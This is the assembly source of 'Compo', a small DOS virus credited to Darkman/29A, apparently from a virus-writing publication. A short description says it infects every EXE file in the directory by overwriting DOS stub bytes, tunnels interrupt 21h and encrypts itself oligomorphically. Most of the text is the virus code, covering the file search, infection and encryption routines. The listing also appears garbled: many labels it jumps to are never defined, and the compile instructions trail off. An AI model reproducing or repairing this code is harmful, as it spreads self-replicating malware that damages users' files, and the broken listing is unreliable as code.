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SLAM4.030: Compo by Darkman/29a
Compo Code by Darkman/29A
Compo is a 145 bytes parasitic direct action new executable DOS stub EXE cavity virus. Infects every file in current directory, when executed, by overwriting the unused bytes in the DOS stub. Compo uses tunnelling of interrupt 21h and is oligomorphic in file.
To compile Compo with Turbo Assembler v 4.0 type:
.model tiny
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ax,4c00h ; Terminate with return code
jmp virus_begin
db 59h dup(?)
lea di,crypt_begin ; DI = offset of crypt_begin
push di ; Save DI at stack
oligo_crypt proc near ; 8-bit ADD/SUB encryptor/decryptor
mov cx,(crypt_end-crypt_begin)
crypt_algo equ byte ptr $+01h ; 8-bit encryption/decryption algo...
crypt_key equ byte ptr $+02h ; 8-bit encryption/decryption key
add byte ptr [di],00h ; 8-bit ADD/SUB encrypt/decrypt
inc di ; Increase DI
loop crypt_loop
ret ; Return!
cli ; Clear interrupt-enable flag
xor sp,sp ; Zero SP
push ax ; Save AX at stack
push es ; Save ES at stack
mov ah,52h ; Get list of lists
int 21h
mov ax,es ; AX = DOS data segment
pop es ; Load ES from stack
cmp ax,0a000h ; DOS data segment in Upper Memory...
jb virus_exit ; Below? Jump to virus_exit
mov word ptr [int21_addr+02h],ax
mov ah,4eh ; Find first matching file
lea dx,file_specifi ; DX = offset of file_specifi
call int21_simula
jnc infect_file ; No error? Jump to infect_file
pop ax ; Load AX from stack
int 21h
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
mov ax,3d02h ; Open file (read/write)
mov dl,9eh ; DX = offset of filename in Disk ...
call int21_simula
xchg ax,bx ; BX = file handle
jc find_next_ ; Error? Jump to find_next_
mov ax,4200h ; Set current file position (SOF)
xor cx,cx ; Zero CX
mov dx,25eh ; CX:DX = offset from origin of ne...
call int21_simula
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
mov ah,3fh ; Read from file
mov cl,02h ; Read two bytes
mov dl,low offset data_buffer
call int21_simula
mov di,dx ; DI = offset of data_buffer
cmp [di],4c01h ; Infectable new executable?
jne close_file ; Not equal? Jump to close_file
in al,40h
lea si,virus_begin ; SI = offset of virus_begin
mov [si+(crypt_key-virus_begin)],al
push es ; Save ES at stack
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)
cld ; Clear direction flag
mov cl,(code_end-virus_begin)
rep movsb ; Create a copy of the virus
pop es ; Load ES from stack
lea di,data_buffer+(crypt_begin-virus_begin)
call oligo_crypt
xor byte ptr [si+(crypt_algo-virus_begin)],(05h xor 2dh)
mov ah,40h ; Write to file
mov cl,(code_end-virus_begin)
call int21_simula
mov ah,3eh ; Close file
call int21_simula
mov ah,4fh ; Find next matching file
jmp find_next
int21_simula proc near ; Simulate interrupt 21h
pushf ; Save flags at stack
db 10011010b ; CALL imm32 (opcode 9ah)
int21_addr dd 0000109eh ; Address of interrupt 21h
ret ; Return!
file_specifi db '*.EXE' ; File specification
data_buffer db (code_end-virus_begin) dup(?)
virus_name db '[Compo] ' ; Name of the virus
virus_author db '[Darkman/29A] ' ; Author of the virus
end code_begin